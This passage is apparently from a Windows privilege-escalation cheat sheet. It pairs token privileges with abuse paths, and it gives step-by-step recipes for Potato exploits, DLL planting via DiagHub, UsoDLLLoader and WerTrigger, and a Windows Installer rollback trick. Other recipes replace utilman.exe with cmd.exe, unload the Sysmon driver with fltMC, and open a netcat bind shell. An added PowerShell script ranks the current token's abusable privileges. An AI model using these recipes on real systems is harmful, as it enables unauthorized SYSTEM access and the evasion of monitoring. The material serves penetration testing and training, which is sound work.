| SeBackup | Threat | Built-in commands | Read sensitive files with robocopy /b | - May be more interesting if you can read %WINDIR%\MEMORY.DMP<br>- SeBackupPrivilege (and robocopy) is not helpful when it comes to open files.<br>- Robocopy requires both SeBackup and SeRestore to work with /b parameter. |
| SeCreateToken | Admin | 3rd party tool | Create arbitrary token including local admin rights with NtCreateToken. | |
| SeLoadDriver | Admin | 3rd party tool | 1. Load buggy kernel driver such as szkg64.sys or capcom.sys<br>2. Exploit the driver vulnerability<br>Alternatively, the privilege may be used to unload security-related drivers with the fltMC builtin command, i.e.: fltMC unload sysmondrv | 1. The szkg64 vulnerability is listed as CVE-2018-15732<br>2. The szkg64 exploit code was created by Parvez Anwar |
| SeRestore | Admin | PowerShell | 1. Launch PowerShell/ISE with the SeRestore privilege present.<br>2. Enable the privilege with Enable-SeRestorePrivilege.<br>3. Rename utilman.exe to utilman.old<br>4. Rename cmd.exe to utilman.exe<br>5. Lock the console and press Win+U | Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| SeTakeOwnership | Admin | Built-in commands | 1. takeown.exe /f "%windir%\system32"<br>2. icacls.exe "%windir%\system32" /grant "%username%":F<br>3. Rename cmd.exe to utilman.exe<br>4. Lock the console and press Win+U | Attack may be detected by some AV software. Alternative method relies on replacing service binaries stored in "Program Files" using the same privilege. |
| SeTcb | Admin | 3rd party tool | Manipulate tokens to have local admin rights included. May require SeImpersonate. To be verified. | |
| SeRelabel | Admin | 3rd party tool | Allows you to own resources that have an integrity level even higher than your own | |
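An added example, not from the original page, that maps the current token's privileges to the abuse paths in the table above and picks the Potato variant by OS build (the 1809 / Server 2019 boundary the Potato sections below refer to). A privilege shown as Disabled is still on the token and can be enabled by the process itself, so it counts.

```powershell
# Added example: which of the current token's privileges are directly abusable, and how.
function Get-AbusablePrivilege {
    $abuse = @{
        'SeImpersonatePrivilege'        = 'Potato family / PrintSpoofer -> NT AUTHORITY\SYSTEM'
        'SeAssignPrimaryTokenPrivilege' = 'Potato family -> NT AUTHORITY\SYSTEM'
        'SeBackupPrivilege'             = 'Read any file: robocopy /b, reg save HKLM\SAM'
        'SeRestorePrivilege'            = 'Write any file: replace utilman.exe or a service binary'
        'SeTakeOwnershipPrivilege'      = 'takeown + icacls on system32, then as SeRestore'
        'SeLoadDriverPrivilege'         = 'Load a signed vulnerable driver (szkg64 CVE-2018-15732, capcom)'
        'SeTcbPrivilege'                = 'Token manipulation, may need SeImpersonate'
        'SeCreateTokenPrivilege'        = 'NtCreateToken with the local Administrators group'
        'SeRelabelPrivilege'            = 'Take ownership of higher-integrity objects'
        'SeDebugPrivilege'              = 'Open SYSTEM processes: token theft / injection'
    }
    $build = [int](Get-CimInstance -ClassName Win32_OperatingSystem).BuildNumber
    # 17763 = Windows 10 1809 / Server 2019, where the JuicyPotato DCOM trick stops working.
    $potato = if ($build -ge 17763) { 'RoguePotato / PrintSpoofer / JuicyPotatoNG' } else { 'JuicyPotato' }

    # whoami /priv /fo csv yields the columns "Privilege Name", "Description", "State".
    foreach ($p in (whoami /priv /fo csv | ConvertFrom-Csv)) {
        $name = $p.'Privilege Name'
        if (-not $abuse.ContainsKey($name)) { continue }
        $hint = $abuse[$name]
        if ($name -in 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege') { $hint += " (build $build: $potato)" }
        [pscustomobject]@{ Privilege = $name; State = $p.State; Abuse = $hint }
    }
}

Get-AbusablePrivilege | Format-Table -AutoSize
```

From an elevated-but-filtered context (an administrator under UAC) the output shows the filtered token; from a service account such as an IIS application pool or MSSQL it typically shows SeImpersonatePrivilege, which is the usual entry point for the Potato section.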
Restore A Service Account's Privileges
This tool should be executed as LOCAL SERVICE or NETWORK SERVICE only; it recovers the default privilege set of those accounts (including SeImpersonatePrivilege) when a service has been started with a reduced token.
Meterpreter getsystem and alternatives
RottenPotato (Token Impersonation)
Binary available at : foxglovesec/RottenPotato and breenmachine/RottenPotatoNG
Exploit using Metasploit with the incognito module loaded.
Juicy Potato (Abusing the golden privileges)
If the machine is Windows 10 1809 / Windows Server 2019 or later, try Rogue Potato (or PrintSpoofer, JuicyPotatoNG). If the machine is older than Windows 10 1809 / Windows Server 2019, try Juicy Potato.
Binary available at : ohpe/juicy-potato
Check the privileges of the service account; you are looking for SeImpersonatePrivilege ("Impersonate a client after authentication") and/or SeAssignPrimaryTokenPrivilege ("Replace a process level token").
Select a CLSID based on your Windows version, a CLSID is a globally unique identifier that identifies a COM class object
Execute JuicyPotato to run a privileged command.
Rogue Potato (Fake OXID Resolver)
Binary available at antonioCoco/RoguePotato
EFSPotato (MS-EFSR EfsRpcOpenFileRaw)
Binary available at https://github.com/zcgonvh/EfsPotato
JuicyPotatoNG
PrintSpoofer (Printer Bug)
This works if SeImpersonatePrivilege is present on the token.
Binary available at https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0
EoP - Privileged File Write
DiagHub
⚠️ Starting with version 1903 and above, DiagHub can no longer be used to load arbitrary DLLs.
The Microsoft Diagnostics Hub Standard Collector Service (DiagHub) is a service that collects trace information and is programmatically exposed via DCOM. This DCOM object can be used to load a DLL into a SYSTEM process, provided that this DLL exists in the C:\Windows\System32 directory.
Exploit
- Create an evil DLL, e.g. payload.dll, and move it into C:\Windows\System32
- Build https://github.com/xct/diaghub
- Run: diaghub.exe c:\\ProgramData\\ payload.dll
- The default payload will run C:\Windows\System32\spool\drivers\color\nc.exe -lvp 2000 -e cmd.exe
Alternative tools:
https://github.com/Accenture/AARO-Bugs/tree/master/CVE-2020-5825/TrigDiag
https://github.com/decoder-it/diaghub_exploit
UsoDLLLoader
⚠️ 2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview.
An alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo).
If we find a privileged file write vulnerability in Windows or in some third-party software, we can copy our own version of windowscoredeviceinfo.dll into C:\Windows\System32\ and then have it loaded by the USO service to get arbitrary code execution as NT AUTHORITY\SYSTEM.
Exploit
Build https://github.com/itm4n/UsoDllLoader:
- Select Release config and x64 architecture.
- Build solution.
- DLL: .\x64\Release\WindowsCoreDeviceInfo.dll
- Loader: .\x64\Release\UsoDllLoader.exe
Copy WindowsCoreDeviceInfo.dll to C:\Windows\System32\
Use the loader and wait for the shell, or run usoclient StartInteractiveScan and connect to the bind shell on port 1337.
WerTrigger
Exploit privileged file write bugs with Windows Problem Reporting
- Clone https://github.com/sailay1996/WerTrigger
- Copy phoneinfo.dll to C:\Windows\System32\
- Place the Report.wer file and WerTrigger.exe in the same directory, then run WerTrigger.exe.
- Enjoy a shell as NT AUTHORITY\SYSTEM
WerMgr
Exploit privileged directory creation bugs with Windows Error Reporting
- Clone https://github.com/binderlabs/DirCreate2System
- Create the directory C:\Windows\System32\wermgr.exe.local\
- Grant access to it: cacls C:\Windows\System32\wermgr.exe.local /e /g everyone:f
- Place the spawn.dll file and dircreate2system.exe in the same directory and run .\dircreate2system.exe
- Enjoy a shell as NT AUTHORITY\SYSTEM
EoP - Privileged File Delete
During an MSI installation, the Windows Installer service keeps a record of every change in case it needs to roll back. To do that it creates a folder at C:\Config.Msi containing a rollback script (.rbs) and a rollback file (.rbf).
To convert a privileged file delete into a local privilege escalation, abuse the Windows Installer service:
- delete the protected C:\Config.Msi folder immediately after it is created by the Windows Installer
- recreate the C:\Config.Msi folder with weak DACL permissions (ordinary users are allowed to create folders at the root of C:\)
- drop malicious .rbs and .rbf files into it to be executed by the MSI rollback
- upon rollback, Windows Installer then makes the changes described by your rollback script, as SYSTEM
The easiest way to trigger this chain is the zdi/FilesystemEoPs FolderOrFileDeleteToSystem PoC. The exploit contains a .msi file with 2 actions: the first one produces a delay and the second throws an error to force the rollback. This rollback will "restore" a malicious HID.dll in C:\Program Files\Common Files\microsoft shared\ink\HID.dll.
Then switch to the secure desktop using [CTRL]+[ALT]+[DELETE] and open the On-Screen Keyboard (osk.exe). The osk.exe process, which runs as SYSTEM on the secure desktop, looks for C:\Program Files\Common Files\microsoft shared\ink\HID.dll before C:\Windows\System32\HID.dll and loads the planted library.
EoP - Common Vulnerabilities and Exposures
MS08-067 (NetAPI)
Check the vulnerability with the following nmap script.
Metasploit modules to exploit MS08-067 NetAPI.
If you can't use Metasploit and only want a reverse shell.
MS10-015 (KiTrap0D) - Microsoft Windows NT/2000/2003/2008/XP/Vista/7
'KiTrap0D' User Mode to Ring Escalation (MS10-015)
MS11-080 (afd.sys) - Microsoft Windows XP/2003
MS15-051 (Client Copy Image) - Microsoft Windows 2003/2008/7/8/2012
MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64)
Check if the patch is installed : wmic qfe list | findstr "3139914"
MS17-010 (Eternal Blue)
Check the vulnerability with the following nmap script or with netexec: netexec smb 10.10.10.10 -u '' -p '' -d domain -M ms17-010
Metasploit modules to exploit EternalRomance/EternalSynergy/EternalChampion.
If you can't use Metasploit and only want a reverse shell.
CVE-2019-1388
Exploit : https://packetstormsecurity.com/files/14437/hhupd.exe.html
Requirement:
- Windows 7
- Windows 10 LTSC 10240
Failing on:
- LTSC 2019
- 1709
- 1803
Detailed information about the vulnerability : https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege
References